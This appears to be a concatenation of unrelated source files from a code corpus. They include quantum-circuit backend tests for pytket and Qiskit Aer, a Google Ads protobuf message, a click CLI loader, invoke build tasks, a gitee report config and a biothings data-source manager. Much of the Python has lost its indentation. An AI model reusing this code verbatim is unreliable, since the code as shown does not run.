def test_mixed_circuit() -> None:
c = Circuit()
qr = c.add_q_register("q", 2)
ar = c.add_c_register("a", 1)
br = c.add_c_register("b", 1)
c.H(qr[0])
c.Measure(qr[0], ar[0])
c.X(qr[1], condition=reg_eq(ar, 0))
c.Measure(qr[1], br[0])
backend = AerBackend()
c = backend.get_compiled_circuit(c)
counts = backend.run_circuit(c, n_shots=1024).get_counts()
for key in counts.keys():
assert key in {(0, 1), (1, 0)}
def test_aer_placed_expectation() -> None:
# bug TKET-695
n_qbs = 3
c = Circuit(n_qbs, n_qbs)
c.X(0)
c.CX(0, 2)
c.CX(1, 2)
c.H(1)
# c.measure_all()
b = AerBackend()
operator = QubitPauliOperator(
{
QubitPauliString(Qubit(0), Pauli.Z): 1.0,
QubitPauliString(Qubit(1), Pauli.X): 0.5,
}
)
assert b.get_operator_expectation_value(c, operator) == (-0.5 + 0j)
with open(os.path.join(sys.path[0], "ibmqx2_properties.pickle"), "rb") as f:
properties = pickle.load(f)
noise_model = NoiseModel.from_backend(properties)
noise_b = AerBackend(noise_model)
with pytest.raises(RuntimeError) as errorinfo:
noise_b.get_operator_expectation_value(c, operator)
assert "not supported with noise model" in str(errorinfo.value)
c.rename_units({Qubit(1): Qubit("node", 1)})
with pytest.raises(ValueError) as errorinfoCirc:
b.get_operator_expectation_value(c, operator)
assert "default register Qubits" in str(errorinfoCirc.value)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_ibmq_emulator() -> None:
b_emu = IBMQEmulatorBackend(
"ibmq_santiago", hub="ibm-q", group="open", project="main"
)
assert b_emu._noise_model is not None
b_ibm = b_emu._ibmq
b_aer = AerBackend()
for ol in range(3):
comp_pass = b_emu.default_compilation_pass(ol)
c = Circuit(3, 3)
c.H(0)
c.CX(0, 1)
c.CSWAP(1, 0, 2)
c.ZZPhase(0.84, 2, 0)
c_cop = c.copy()
comp_pass.apply(c_cop)
c.measure_all()
for bac in (b_emu, b_ibm):
assert all(pred.verify(c_cop) for pred in bac.required_predicates)
c_cop_2 = c.copy()
c_cop_2 = b_aer.get_compiled_circuit(c_cop_2, ol)
if ol == 0:
assert not all(pred.verify(c_cop_2) for pred in b_emu.required_predicates)
circ = Circuit(2, 2).H(0).CX(0, 1).measure_all()
copy_circ = circ.copy()
b_emu.rebase_pass().apply(copy_circ)
assert b_emu.required_predicates[1].verify(copy_circ)
circ = b_emu.get_compiled_circuit(circ)
b_noi = AerBackend(noise_model=b_emu._noise_model)
emu_shots = b_emu.run_circuit(circ, n_shots=10, seed=10).get_shots()
aer_shots = b_noi.run_circuit(circ, n_shots=10, seed=10).get_shots()
assert np.array_equal(emu_shots, aer_shots)
@given(
n_shots=strategies.integers(min_value=1, max_value=10),
n_bits=strategies.integers(min_value=0, max_value=10),
)
def test_shots_bits_edgecases(n_shots: int, n_bits: int) -> None:
c = Circuit(n_bits, n_bits)
aer_backend = AerBackend()
# TODO TKET-813 add more shot based backends and move to integration tests
h = aer_backend.process_circuit(c, n_shots)
res = aer_backend.get_result(h)
correct_shots = np.zeros((n_shots, n_bits), dtype=int)
correct_shape = (n_shots, n_bits)
correct_counts = Counter({(0,) * n_bits: n_shots})
# BackendResult
assert np.array_equal(res.get_shots(), correct_shots)
assert res.get_shots().shape == correct_shape
assert res.get_counts() == correct_counts
# Direct
res = aer_backend.run_circuit(c, n_shots=n_shots)
assert np.array_equal(res.get_shots(), correct_shots)
assert res.get_shots().shape == correct_shape
assert res.get_counts() == correct_counts
def test_simulation_method() -> None:
state_backends = [AerBackend(), AerBackend(simulation_method="statevector")]
stabilizer_backend = AerBackend(simulation_method="stabilizer")
clifford_circ = Circuit(2).H(0).CX(0, 1).measure_all()
clifford_T_circ = Circuit(2).H(0).T(1).CX(0, 1).measure_all()
for b in state_backends + [stabilizer_backend]:
counts = b.run_circuit(clifford_circ, n_shots=4).get_counts()
assert sum(val for _, val in counts.items()) == 4
for b in state_backends:
counts = b.run_circuit(clifford_T_circ, n_shots=4).get_counts()
assert sum(val for _, val in counts.items()) == 4
with pytest.raises(AttributeError) as warninfo:
# check for the error thrown when non-clifford circuit used with
# stabilizer backend
stabilizer_backend.run_circuit(clifford_T_circ, n_shots=4).get_counts()
assert "Attribute header is not defined" in str(warninfo.value)
def test_aer_expanded_gates() -> None:
c = Circuit(3).CX(0, 1)
c.add_gate(OpType.ZZPhase, 0.1, [0, 1])
c.add_gate(OpType.CY, [0, 1])
c.add_gate(OpType.CCX, [0, 1, 2])
backend = AerBackend()
assert backend.valid_circuit(c)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_remote_simulator() -> None:
remote_qasm = IBMQBackend(
"ibmq_qasm_simulator", hub="ibm-q", group="open", project="main"
)
c = Circuit(3).CX(0, 1)
c.add_gate(OpType.ZZPhase, 0.1, [0, 1])
c.add_gate(OpType.CY, [0, 1])
c.add_gate(OpType.CCX, [0, 1, 2])
c.measure_all()
assert remote_qasm.valid_circuit(c)
assert sum(remote_qasm.run_circuit(c, n_shots=10).get_counts().values()) == 10
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_ibmq_mid_measure(santiago_backend: IBMQBackend) -> None:
c = Circuit(3, 3).H(1).CX(1, 2).Measure(0, 0).Measure(1, 1)
c.add_barrier([0, 1, 2])
c.CX(1, 0).H(0).Measure(2, 2)
b = santiago_backend
ps = b.default_compilation_pass(0)
ps.apply(c)
# c = b.get_compiled_circuit(c)
assert not NoMidMeasurePredicate().verify(c)
assert b.valid_circuit(c)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_compile_x(santiago_backend: IBMQBackend) -> None:
# TKET-1028
b = santiago_backend
c = Circuit(1).X(0)
for ol in range(3):
c1 = c.copy()
c1 = b.get_compiled_circuit(c1, optimisation_level=ol)
assert c1.n_gates == 1
def lift_perm(p: Dict[int, int]) -> np.ndarray:
"""
    Given a permutation of {0,1,...,n-1} return the 2^n by 2^n permutation matrix
representing the permutation of qubits (big-endian convention).
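    For example, lift_perm({0: 1, 1: 0}) is the 4x4 SWAP matrix.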
"""
n = len(p)
pm = np.zeros((1 << n, 1 << n), dtype=complex)
for i in range(1 << n):
j = 0
mask = 1 << n
for q in range(n):
mask >>= 1
if (i & mask) != 0:
j |= 1 << (n - 1 - p[q])
pm[j][i] = 1
return pm
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_compilation_correctness(santiago_backend: IBMQBackend) -> None:
c = Circuit(5)
c.H(0).H(1).H(2)
c.CX(0, 1).CX(1, 2)
c.Rx(0.25, 1).Ry(0.75, 1).Rz(0.5, 2)
c.CCX(2, 1, 0)
c.CY(1, 0).CY(2, 1)
c.H(0).H(1).H(2)
c.Rz(0.125, 0)
c.X(1)
c.Rz(0.125, 2).X(2).Rz(0.25, 2)
c.SX(3).Rz(0.125, 3).SX(3)
c.CX(0, 3).CX(0, 4)
u_backend = AerUnitaryBackend()
u = u_backend.run_circuit(c).get_unitary()
ibm_backend = santiago_backend
for ol in range(3):
p = ibm_backend.default_compilation_pass(optimisation_level=ol)
cu = CompilationUnit(c)
p.apply(cu)
c1 = cu.circuit
compiled_u = u_backend.run_circuit(c1).get_unitary()
# Adjust for placement
imap = cu.initial_map
fmap = cu.final_map
c_idx = {c.qubits[i]: i for i in range(5)}
c1_idx = {c1.qubits[i]: i for i in range(5)}
ini = {c_idx[qb]: c1_idx[node] for qb, node in imap.items()}
inv_fin = {c1_idx[node]: c_idx[qb] for qb, node in fmap.items()}
m_ini = lift_perm(ini)
m_inv_fin = lift_perm(inv_fin)
assert compare_unitaries(u, m_inv_fin @ compiled_u @ m_ini)
# pytket-extensions issue #69
def test_symbolic_rebase() -> None:
circ = QuantumCircuit(2)
circ.rx(Parameter("a"), 0)
circ.ry(Parameter("b"), 1)
circ.cx(0, 1)
pytket_circ = qiskit_to_tk(circ)
# rebase pass could not handle symbolic parameters originally and would fail here:
AerBackend().rebase_pass().apply(pytket_circ)
assert len(pytket_circ.free_symbols()) == 2
def _tk1_to_rotations(a: float, b: float, c: float) -> Circuit:
"""Translate tk1 to a RzRxRz so AerUnitaryBackend can simulate"""
circ = Circuit(1)
circ.Rz(c, 0).Rx(b, 0).Rz(a, 0)
return circ
def _verify_single_q_rebase(
backend: AerUnitaryBackend, a: float, b: float, c: float
) -> bool:
"""Compare the unitary of a tk1 gate to the unitary of the translated circuit"""
rotation_circ = _tk1_to_rotations(a, b, c)
u_before = backend.run_circuit(rotation_circ).get_unitary()
circ = Circuit(1)
circ.add_gate(OpType.TK1, [a, b, c], [0])
backend.rebase_pass().apply(circ)
u_after = backend.run_circuit(circ).get_unitary()
return np.allclose(u_before, u_after)
def test_rebase_phase() -> None:
backend = AerUnitaryBackend()
for a in [0.6, 0, 1, 2, 3]:
for b in [0.7, 0, 0.5, 1, 1.5]:
for c in [0.8, 0, 1, 2, 3]:
assert _verify_single_q_rebase(backend, a, b, c)
assert _verify_single_q_rebase(backend, -a, -b, -c)
assert _verify_single_q_rebase(backend, 2 * a, 3 * b, 4 * c)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_postprocess(lima_backend: IBMQBackend) -> None:
b = lima_backend
assert b.supports_contextual_optimisation
c = Circuit(2, 2)
c.SX(0).SX(1).CX(0, 1).measure_all()
c = b.get_compiled_circuit(c)
h = b.process_circuit(c, n_shots=10, postprocess=True)
ppcirc = Circuit.from_dict(json.loads(cast(str, h[2])))
ppcmds = ppcirc.get_commands()
assert len(ppcmds) > 0
assert all(ppcmd.op.type == OpType.ClassicalTransform for ppcmd in ppcmds)
b.cancel(h)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_postprocess_emu() -> None:
b = IBMQEmulatorBackend("ibmq_santiago", hub="ibm-q", group="open", project="main")
assert b.supports_contextual_optimisation
c = Circuit(2, 2)
c.SX(0).SX(1).CX(0, 1).measure_all()
c = b.get_compiled_circuit(c)
h = b.process_circuit(c, n_shots=10, postprocess=True)
ppcirc = Circuit.from_dict(json.loads(cast(str, h[2])))
ppcmds = ppcirc.get_commands()
assert len(ppcmds) > 0
assert all(ppcmd.op.type == OpType.ClassicalTransform for ppcmd in ppcmds)
r = b.get_result(h)
shots = r.get_shots()
assert len(shots) == 10
@pytest.mark.timeout(None)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_cloud_stabiliser() -> None:
b = IBMQBackend("simulator_stabilizer", hub="ibm-q", group="open", project="main")
c = Circuit(2, 2)
c.H(0).SX(1).CX(0, 1).measure_all()
c = b.get_compiled_circuit(c, 0)
h = b.process_circuit(c, n_shots=10)
assert sum(b.get_result(h).get_counts().values()) == 10
c = Circuit(2, 2)
c.H(0).SX(1).Rz(0.1, 0).CX(0, 1).measure_all()
assert not b.valid_circuit(c)
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_available_devices() -> None:
backend_info_list = IBMQBackend.available_devices(
hub="ibm-q", group="open", project="main"
)
assert len(backend_info_list) > 0
provider = IBMQ.providers(hub="ibm-q", group="open")[0]
backend_info_list = IBMQBackend.available_devices(account_provider=provider)
assert len(backend_info_list) > 0
backend_info_list = IBMQBackend.available_devices()
assert len(backend_info_list) > 0
@pytest.mark.skipif(skip_remote_tests, reason=REASON)
def test_backendinfo_serialization1() -> None:
# https://github.com/CQCL/tket/issues/192
backend = IBMQEmulatorBackend(
"ibmq_santiago", hub="ibm-q", group="open", project="main"
)
backend_info_json = backend.backend_info.to_dict()
s = json.dumps(backend_info_json)
backend_info_json1 = json.loads(s)
assert backend_info_json == backend_info_json1
def test_backendinfo_serialization2() -> None:
# https://github.com/CQCL/tket/issues/192
my_noise_model = NoiseModel()
my_noise_model.add_readout_error(
[
[0.8, 0.2],
[0.2, 0.8],
],
[0],
)
my_noise_model.add_readout_error(
[
[0.7, 0.3],
[0.3, 0.7],
],
[1],
)
my_noise_model.add_quantum_error(depolarizing_error(0.6, 2), ["cx"], [0, 1])
my_noise_model.add_quantum_error(depolarizing_error(0.5, 1), ["u3"], [0])
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Z", 0.65)]), ["u2"], [0]
)
my_noise_model.add_quantum_error(
pauli_error([("X", 0.35), ("Y", 0.65)]), ["u1"], [0]
)
backend = AerBackend(my_noise_model)
backend_info_json = backend.backend_info.to_dict()
s = json.dumps(backend_info_json)
backend_info_json1 = json.loads(s)
assert backend_info_json == backend_info_json1
|
the-stack_0_6514 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import proto # type: ignore
__protobuf__ = proto.module(
package="google.ads.googleads.v8.services",
marshal="google.ads.googleads.v8",
manifest={"GetDomainCategoryRequest",},
)
class GetDomainCategoryRequest(proto.Message):
r"""Request message for
[DomainCategoryService.GetDomainCategory][google.ads.googleads.v8.services.DomainCategoryService.GetDomainCategory].
Attributes:
resource_name (str):
Required. Resource name of the domain
category to fetch.
"""
resource_name = proto.Field(proto.STRING, number=1,)
__all__ = tuple(sorted(__protobuf__.manifest))
|
the-stack_0_6518 | """
Base classes that implement the CLI framework
"""
import logging
import importlib
from collections import OrderedDict
import click
logger = logging.getLogger(__name__)
_COMMAND_PACKAGE = [
"pcskcli.commands.command1",
"pcskcli.commands.command2",
]
class BaseCommand(click.MultiCommand):
def __init__(self, *args, cmd_packages=None, **kwargs):
"""
Initializes the class, optionally with a list of available commands
:param cmd_packages: List of Python packages names of CLI commands
:param args: Other Arguments passed to super class
:param kwargs: Other Arguments passed to super class
"""
super(BaseCommand, self).__init__(*args, **kwargs)
if not cmd_packages:
cmd_packages = _COMMAND_PACKAGE
self._commands = {}
self._commands = BaseCommand._set_commands(cmd_packages)
@staticmethod
def _set_commands(package_names):
"""
        Extract the command name from the package name. The last part of the module path is the command,
        i.e. if the path is foo.bar.baz, then "baz" is the command name.
:param package_names: List of package names
:return: Dictionary with command name as key and the package name as value.
"""
commands = OrderedDict()
for pkg_name in package_names:
cmd_name = pkg_name.split(".")[-1]
commands[cmd_name] = pkg_name
return commands
def list_commands(self, ctx):
"""
Overrides a method from Click that returns a list of commands available in the CLI.
:param ctx: Click context
:return: List of commands available in the CLI
"""
return list(self._commands.keys())
def get_command(self, ctx, cmd_name):
"""
        Overrides a method from ``click.MultiCommand`` that returns the Click CLI object for the given command name, if found.
:param ctx: Click context
:param cmd_name: Top-level command name
:return: Click object representing the command
"""
if cmd_name not in self._commands:
logger.error("Command %s not available", cmd_name)
return None
pkg_name = self._commands[cmd_name]
try:
mod = importlib.import_module(pkg_name)
except ImportError:
logger.exception("Command '%s' is not configured correctly. Unable to import '%s'", cmd_name, pkg_name)
return None
if not hasattr(mod, "cli"):
logger.error("Command %s is not configured correctly. It must expose an function called 'cli'", cmd_name)
return None
return mod.cli |
the-stack_0_6519 | """
Invoke entrypoint, import here all the tasks we want to make available
"""
import os
from invoke import Collection
from . import (
agent,
android,
bench,
cluster_agent,
cluster_agent_cloudfoundry,
customaction,
docker,
dogstatsd,
github,
installcmd,
pipeline,
process_agent,
pylauncher,
release,
rtloader,
security_agent,
selinux,
system_probe,
systray,
trace_agent,
uninstallcmd,
)
from .build_tags import audit_tag_impact
from .go import cyclo, deps, fmt, generate, generate_licenses, golangci_lint, lint, lint_licenses, reset, vet
from .test import (
check_gitlab_broken_dependencies,
e2e_tests,
install_shellcheck,
integration_tests,
lint_filenames,
lint_milestone,
lint_python,
lint_releasenote,
lint_teamassignment,
make_kitchen_gitlab_yml,
make_simple_gitlab_yml,
test,
)
# the root namespace
ns = Collection()
# add single tasks to the root
ns.add_task(fmt)
ns.add_task(lint)
ns.add_task(vet)
ns.add_task(cyclo)
ns.add_task(golangci_lint)
ns.add_task(test)
ns.add_task(integration_tests)
ns.add_task(deps)
ns.add_task(lint_licenses)
ns.add_task(generate_licenses)
ns.add_task(reset)
ns.add_task(lint_teamassignment)
ns.add_task(lint_releasenote)
ns.add_task(lint_milestone)
ns.add_task(lint_filenames)
ns.add_task(lint_python)
ns.add_task(audit_tag_impact)
ns.add_task(e2e_tests)
ns.add_task(make_kitchen_gitlab_yml)
ns.add_task(make_simple_gitlab_yml)
ns.add_task(check_gitlab_broken_dependencies)
ns.add_task(generate)
ns.add_task(install_shellcheck)
# add namespaced tasks to the root
ns.add_collection(agent)
ns.add_collection(android)
ns.add_collection(cluster_agent)
ns.add_collection(cluster_agent_cloudfoundry)
ns.add_collection(customaction)
ns.add_collection(installcmd)
ns.add_collection(bench)
ns.add_collection(trace_agent)
ns.add_collection(docker)
ns.add_collection(dogstatsd)
ns.add_collection(github)
ns.add_collection(pipeline)
ns.add_collection(pylauncher)
ns.add_collection(selinux)
ns.add_collection(systray)
ns.add_collection(release)
ns.add_collection(rtloader)
ns.add_collection(system_probe)
ns.add_collection(process_agent)
ns.add_collection(uninstallcmd)
ns.add_collection(security_agent)
ns.configure(
{
'run': {
# workaround waiting for a fix being merged on Invoke,
# see https://github.com/pyinvoke/invoke/pull/407
'shell': os.environ.get('COMSPEC', os.environ.get('SHELL')),
# this should stay, set the encoding explicitly so invoke doesn't
# freak out if a command outputs unicode chars.
'encoding': 'utf-8',
}
}
)
|
the-stack_0_6520 | import os
token = 'your gitee account token'
report_header = [
'packageName',
'rvPRUser',
'rvPRUrl',
'rvPRStatus',
'created_at',
'updated_at',
'lastest comment time',
'lastest comment submitter'
]
headers = {
'Content-Type': 'application/json;charset=UTF-8'
}
owner = 'openEuler-RISC-V'
excelfile = os.path.join(os.getcwd(), 'pr_info.xlsx') |
the-stack_0_6523 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = "Christian Heider Nielsen"
__doc__ = r"""
Created on 02-12-2020
"""
from contextlib import contextmanager
from itertools import tee
from typing import Iterator
from torch.nn import Module
from draugr.torch_utilities.optimisation.parameters.freezing.parameters import (
freeze_parameters,
)
__all__ = ["freeze_model", "frozen_model"]
def freeze_model(model: Module, value: bool = None, recurse: bool = True) -> None:
"""
:param model:
:type model:
:param recurse:
:param value:
:return:"""
freeze_parameters(model.parameters(recurse), value)
@contextmanager
def frozen_model(model: Module, recurse: bool = True, enabled: bool = True) -> Iterator[bool]:
    """
    Context manager that freezes the parameters of ``model`` on entry and unfreezes them on exit.
    :param enabled: if False, the parameters are left untouched
    :type enabled: bool
    :param model: module whose parameters are frozen for the duration of the block
    :param recurse: whether to include the parameters of submodules
    :return:"""
params_1, params_2 = tee(model.parameters(recurse))
if enabled:
freeze_parameters(params_1, True)
yield True
if enabled:
freeze_parameters(params_2, False)
if __name__ == "__main__":
from torch import nn
def asda():
""" """
a = nn.Linear(10, 5)
print(a.weight.requires_grad)
with frozen_model(a):
print(a.weight.requires_grad)
print(a.weight.requires_grad)
asda()
|
the-stack_0_6524 | import torch
import torch.nn as nn
import torch.nn.functional as F
import math
class Norm(nn.Module):
def __init__(self, d_model, eps = 1e-6):
super().__init__()
self.size = d_model
# create two learnable parameters to calibrate normalisation
self.alpha = nn.Parameter(torch.ones(self.size))
self.bias = nn.Parameter(torch.zeros(self.size))
self.eps = eps
def forward(self, x):
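        # layer norm: standardise the last dimension, then rescale with the
        # learnable gain (alpha) and shift (bias)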
norm = self.alpha * (x - x.mean(dim=-1, keepdim=True)) \
/ (x.std(dim=-1, keepdim=True) + self.eps) + self.bias
return norm
def attention(q, k, v, d_k, mask=None, dropout=None):
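    # scaled dot-product attention: softmax(Q.K^T / sqrt(d_k)).V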
scores = torch.matmul(q, k.transpose(-2, -1)) / math.sqrt(d_k)
if mask is not None:
#mask = mask.unsqueeze(1)
#scores = scores.masked_fill(mask == 0, -1e9)
pass
scores = F.softmax(scores, dim=-1)
if dropout is not None:
scores = dropout(scores)
output = torch.matmul(scores, v)
return output
class MultiHeadAttention(nn.Module):
def __init__(self, heads, d_model, dropout = 0.1):
super().__init__()
self.d_model = d_model
self.d_k = d_model // heads
self.h = heads
self.q_linear = nn.Linear(d_model, d_model)
self.v_linear = nn.Linear(d_model, d_model)
self.k_linear = nn.Linear(d_model, d_model)
self.dropout = nn.Dropout(dropout)
self.out = nn.Linear(d_model, d_model)
def forward(self, q, k, v, mask=None):
bs = q.size(0)
# perform linear operation and split into N heads
k = self.k_linear(k).view(bs, -1, self.h, self.d_k)
q = self.q_linear(q).view(bs, -1, self.h, self.d_k)
v = self.v_linear(v).view(bs, -1, self.h, self.d_k)
        # transpose to get dimensions bs * heads * sl * d_k
k = k.transpose(1,2)
q = q.transpose(1,2)
v = v.transpose(1,2)
# calculate attention using function we will define next
scores = attention(q, k, v, self.d_k, mask, self.dropout)
# concatenate heads and put through final linear layer
concat = scores.transpose(1,2).contiguous()\
.view(bs, -1, self.d_model)
output = self.out(concat)
return output
class FeedForward(nn.Module):
def __init__(self, d_model, d_ff=2048, dropout = 0.1):
super().__init__()
# We set d_ff as a default to 2048
self.linear_1 = nn.Linear(d_model, d_ff)
self.dropout = nn.Dropout(dropout)
self.linear_2 = nn.Linear(d_ff, d_model)
def forward(self, x):
x = self.dropout(F.relu(self.linear_1(x)))
x = self.linear_2(x)
return x
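# Minimal shape check (illustrative usage sketch; the sizes below are arbitrary):
if __name__ == "__main__":
    x = torch.randn(2, 5, 16)  # (batch, seq_len, d_model)
    mha = MultiHeadAttention(heads=4, d_model=16)
    out = mha(x, x, x)  # self-attention
    print(out.shape)  # torch.Size([2, 5, 16])
    ff = FeedForward(d_model=16, d_ff=32)
    print(ff(out).shape)  # torch.Size([2, 5, 16])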
|
the-stack_0_6528 | import os
import sys
import types
import logging
from pprint import pformat
import importlib
from biothings.utils.hub_db import get_data_plugin
from biothings.utils.manager import BaseSourceManager
from biothings.utils.hub_db import get_src_master, get_src_dump
class SourceManager(BaseSourceManager):
"""
Helper class to get information about a datasource,
whether it has a dumper and/or uploaders associated.
"""
def __init__(self, source_list, dump_manager, upload_manager,
data_plugin_manager):
self._orig_source_list = source_list
self.source_list = None
self.dump_manager = dump_manager
self.upload_manager = upload_manager
self.data_plugin_manager = data_plugin_manager
self.reload()
self.src_master = get_src_master()
self.src_dump = get_src_dump()
        # honoring BaseSourceManager interface (gloups...)
self.register = {}
def reload(self):
# clear registers
self.dump_manager.register.clear()
self.upload_manager.register.clear()
# re-eval source list (so if it's a string, it'll re-discover sources)
self.source_list = self.find_sources(self._orig_source_list)
self.dump_manager.register_sources(self.source_list)
self.upload_manager.register_sources(self.source_list)
def find_sources(self, paths):
sources = []
if not type(paths) == list:
paths = [paths]
def eval_one_source(one_path):
if "/" in one_path:
# it's path to directory
# expecting
if one_path not in sys.path:
logging.info("Adding '%s' to python path" % one_path)
sys.path.insert(0, one_path)
for d in os.listdir(one_path):
if d.endswith("__pycache__"):
continue
sources.append(d)
else:
                # assuming it's a path to a python module (path.to.module)
sources.append(one_path)
def eval_one_root(root):
logging.debug("Discovering sources in %s" % root)
# root is a module path where sources can be found
rootdir, __init__ = os.path.split(root.__file__)
for srcdir in os.listdir(rootdir):
if srcdir.endswith("__pycache__"):
continue
srcpath = os.path.join(rootdir, srcdir)
if os.path.isdir(srcpath):
srcmod_str = "%s.%s" % (root.__name__, srcdir)
sources.append(srcmod_str)
for path in paths:
if type(path) == str:
eval_one_source(path)
elif isinstance(path, types.ModuleType):
eval_one_root(path)
# clean with only those which can be imported
sources = set(sources)
for s in [s for s in sources]:
try:
importlib.import_module(s)
except Exception as e:
logging.error("Failed to discover source '%s': %s" % (s, e))
sources.remove(s)
logging.info("Found sources: %s" % sorted(sources))
return sources
def set_mapping_src_meta(self, subsrc, mini):
# get mapping from uploader klass first (hard-coded), then src_master (generated/manual)
src_meta = {}
mapping = {}
origin = None
try:
upk = self.upload_manager["%s.%s" % (mini["_id"], subsrc)]
assert len(
upk) == 1, "More than 1 uploader found, can't handle that..."
upk = upk.pop()
src_meta = upk.__metadata__["src_meta"]
mapping = upk.get_mapping()
origin = "uploader"
if not mapping:
raise AttributeError("Not hard-coded mapping")
except (IndexError, KeyError, AttributeError) as e:
logging.debug(
"Can't find hard-coded mapping, now searching src_master: %s" %
e)
m = self.src_master.find_one({"_id": subsrc})
mapping = m and m.get("mapping")
origin = "master"
# use metadata from upload or reconstitute(-ish)
src_meta = src_meta or m and dict([(k, v) for (k, v) in m.items() if k not in ["_id", "name", "timestamp", "mapping"]])
if mapping:
mini.setdefault("mapping",
{}).setdefault(subsrc,
{}).setdefault("mapping", mapping)
mini.setdefault("mapping",
{}).setdefault(subsrc,
{}).setdefault("origin", origin)
if src_meta:
mini.setdefault("__metadata__", {}).setdefault(subsrc, src_meta)
def sumup_source(self, src, detailed=False):
"""Return minimal info about src"""
mini = {}
mini["_id"] = src.get("_id", src["name"])
mini["name"] = src["name"]
if src.get("download"):
mini["download"] = {
"status": src["download"].get("status"),
"time": src["download"].get("time"),
"started_at": src["download"].get("started_at"),
"release": src["download"].get("release"),
"data_folder": src["download"].get("data_folder"),
}
mini["download"]["dumper"] = src["download"].get("dumper", {})
if src["download"].get("err"):
mini["download"]["error"] = src["download"]["err"]
if src["download"].get("tb"):
mini["download"]["traceback"] = src["download"]["tb"]
count = 0
if src.get("upload"):
mini["upload"] = {"sources": {}}
for job, info in src["upload"]["jobs"].items():
mini["upload"]["sources"][job] = {
"time": info.get("time"),
"status": info.get("status"),
"count": info.get("count"),
"started_at": info.get("started_at"),
"release": info.get("release"),
"data_folder": info.get("data_folder"),
}
if info.get("err"):
mini["upload"]["sources"][job]["error"] = info["err"]
if info.get("tb"):
mini["upload"]["sources"][job]["traceback"] = info["tb"]
count += info.get("count") or 0
if detailed:
self.set_mapping_src_meta(job, mini)
if src.get("inspect"):
mini["inspect"] = {"sources": {}}
for job, info in src["inspect"]["jobs"].items():
if not detailed:
# remove big inspect data but preserve inspect status/info and errors
mode_has_error = []
mode_ok = []
for mode in info.get("inspect", {}).get("results", {}):
if info["inspect"]["results"][mode].get("errors"):
mode_has_error.append(mode)
else:
mode_ok.append(mode)
for mode in mode_ok:
info["inspect"]["results"].pop(mode)
for mode in mode_has_error:
keys = list(info["inspect"]["results"][mode].keys())
# remove all except errors
for k in keys:
if k != "errors":
info["inspect"]["results"][mode].pop(k)
mini["inspect"]["sources"][job] = info
if src.get("locked"):
mini["locked"] = src["locked"]
mini["count"] = count
return mini
def get_sources(self, id=None, debug=False, detailed=False):
dm = self.dump_manager
um = self.upload_manager
dpm = self.data_plugin_manager
ids = set()
if id and id in dm.register:
ids.add(id)
elif id and id in um.register:
ids.add(id)
elif id and id in dpm.register:
ids.add(id)
else:
# either no id passed, or doesn't exist
if id and not len(ids):
raise ValueError("Source %s doesn't exist" % repr(id))
ids = set(dm.register)
ids.update(um.register)
ids.update(dpm.register)
sources = {}
bydsrcs = {}
byusrcs = {}
bydpsrcs = {}
plugins = get_data_plugin().find()
[bydsrcs.setdefault(src["_id"], src) for src in dm.source_info() if dm]
[byusrcs.setdefault(src["_id"], src) for src in um.source_info() if um]
[bydpsrcs.setdefault(src["_id"], src) for src in plugins]
for _id in ids:
# start with dumper info
if dm:
src = bydsrcs.get(_id)
if src:
if debug:
sources[src["name"]] = src
else:
sources[src["name"]] = self.sumup_source(src, detailed)
# complete with uploader info
if um:
src = byusrcs.get(_id)
if src:
# collection-only source don't have dumpers and only exist in
# the uploader manager
if not src["_id"] in sources:
sources[src["_id"]] = self.sumup_source(src, detailed)
if src.get("upload"):
for subname in src["upload"].get("jobs", {}):
try:
sources[src["name"]].setdefault(
"upload",
{"sources": {}})["sources"].setdefault(
subname, {})
sources[src["name"]]["upload"]["sources"][
subname]["uploader"] = src["upload"][
"jobs"][subname].get("uploader")
except Exception as e:
logging.error("Source is invalid: %s\n%s" %
(e, pformat(src)))
# deal with plugin info if any
if dpm:
src = bydpsrcs.get(_id)
if src:
assert len(
dpm[_id]
) == 1, "Expected only one uploader, got: %s" % dpm[_id]
klass = dpm[_id][0]
src.pop("_id")
if hasattr(klass, "data_plugin_error"):
src["error"] = klass.data_plugin_error
sources.setdefault(_id, {"data_plugin": {}})
if src.get("download", {}).get("err"):
src["download"]["error"] = src["download"].pop("err")
if src.get("download", {}).get("tb"):
src["download"]["traceback"] = src["download"].pop("tb")
sources[_id]["data_plugin"] = src
sources[_id]["_id"] = _id
sources[_id]["name"] = _id
if id:
src = list(sources.values()).pop()
# enrich with metadata (uploader > dumper)
ks = []
if dm:
try:
ks.extend(dm.register[id])
except KeyError:
pass
if um:
try:
ks.extend(um.register[id])
except KeyError:
pass
for upk in ks:
# name either from uploader or dumper
name = getattr(upk, "name", None) or upk.SRC_NAME
if getattr(upk, "__metadata__", {}).get("src_meta"):
src.setdefault("__metadata__", {}).setdefault(name, {})
src["__metadata__"][name] = upk.__metadata__["src_meta"]
# simplify as needed (if only one source in metadata, remove source key level,
# or if licenses are the same amongst sources, keep one copy)
if len(src.get("__metadata__", {})) == 1:
src["__metadata__"] = list(src["__metadata__"].values()).pop()
elif len(src.get("__metadata__", {})) > 1:
metas = list(src["__metadata__"].values())
simplified = [metas.pop()]
same = True
while metas:
m = metas.pop()
if m not in simplified:
same = False
break
if same:
# we consume all of them, ie. they're all equals
src["__metadata__"] = list(
src["__metadata__"].values()).pop()
else:
# convert to a list of dict (so it's easier to detect if one or more
# licenses just by checking if type is dict (one) or array (more))
metas = src.pop("__metadata__")
src["__metadata__"] = []
for m in metas:
src["__metadata__"].append({m: metas[m]})
return src
else:
return list(sources.values())
def get_source(self, name, debug=False):
return self.get_sources(id=name, debug=debug, detailed=True)
def save_mapping(self, name, mapping=None, dest="master", mode="mapping"):
